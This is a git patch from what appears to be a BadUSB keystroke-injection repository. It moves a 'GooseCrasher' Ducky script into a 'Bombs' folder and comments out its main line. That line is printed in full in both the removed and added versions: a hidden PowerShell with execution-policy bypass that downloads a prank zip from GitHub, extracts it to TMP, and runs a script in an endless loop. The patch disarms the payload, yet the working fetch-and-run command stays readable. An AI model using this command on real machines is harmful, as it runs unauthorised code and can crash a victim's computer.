From f0c91b90ed27faacc309cd2f9b176300ee8b45ab Mon Sep 17 00:00:00 2001 From: FalsePhilosopher Date: Fri, 4 Nov 2022 13:50:33 -0600 Subject: [PATCH] Moved GC to bomb/disarm --- BadUSB/{ => Bombs}/GooseCrasher.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename BadUSB/{ => Bombs}/GooseCrasher.txt (64%) diff --git a/BadUSB/GooseCrasher.txt b/BadUSB/Bombs/GooseCrasher.txt similarity index 64% rename from BadUSB/GooseCrasher.txt rename to BadUSB/Bombs/GooseCrasher.txt index 2d5bd644..5a8b66ad 100644 --- a/BadUSB/GooseCrasher.txt +++ b/BadUSB/Bombs/GooseCrasher.txt @@ -13,5 +13,5 @@ DELAY 500 STRING powershell ENTER DELAY 2000 -STRING powershell -w h -NoP -NonI ($Z="$env:TMP"+'\dg.zip');$D="$env:TMP"+'\dg';curl https://github.com/UberGuidoZ/FalsePhilosopher-BadUSB-Playground/raw/89f0c34e05fbf9926d6524b154d9d7be99763665/Ducky/USBRubberducky/library/prank/Win/Desktop_Goose/dg.zip -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;;powershell -Exec Bypass "while (1) {$D\dgc.ps1}" +REM STRING powershell -w h -NoP -NonI ($Z="$env:TMP"+'\dg.zip');$D="$env:TMP"+'\dg';curl https://github.com/UberGuidoZ/FalsePhilosopher-BadUSB-Playground/raw/89f0c34e05fbf9926d6524b154d9d7be99763665/Ducky/USBRubberducky/library/prank/Win/Desktop_Goose/dg.zip -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;;powershell -Exec Bypass "while (1) {$D\dgc.ps1}" ENTER